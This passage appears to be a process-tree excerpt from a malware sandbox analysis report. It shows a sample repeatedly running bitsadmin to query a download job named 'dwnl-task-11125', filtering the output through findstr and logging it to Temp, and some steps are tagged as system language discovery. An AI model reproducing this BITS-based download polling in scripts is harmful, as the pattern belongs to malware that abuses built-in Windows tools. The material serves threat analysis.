C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3220
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2984
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1260
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3180
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1920
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2096
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1540
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4032
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3116
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4036
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1288
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3204
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3988
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3104
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3764
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3648
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1628
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:884
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3884
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2900
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3228
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4084
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:688
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2860
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1324
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1072
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1280
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2380
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2508
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3892
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2320
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1624
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3148
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1908
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3172
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1260
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4000
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1672
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3168
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3540
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2828
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2084
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3988
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2744
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1688
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3064
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:916
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3260
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:884
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:904
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2728
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2992
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3128
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3892
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2424
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2680
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3148
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1916
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3076
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3144
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2740
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2912
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1540
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1164
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3540
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:3792 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1920
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:340
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2376
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:940
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1696
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1284
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1628
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2040
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1928
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3152
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:820
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:980
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:760
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1356
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1548
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2508
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3724
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3128
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1648
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3148
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3448
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2788
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2220
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3140
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:352
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4000
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1672
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4088
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2060
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2700
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4076
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2296
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3688
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3896
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:748
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2968
-
-
-
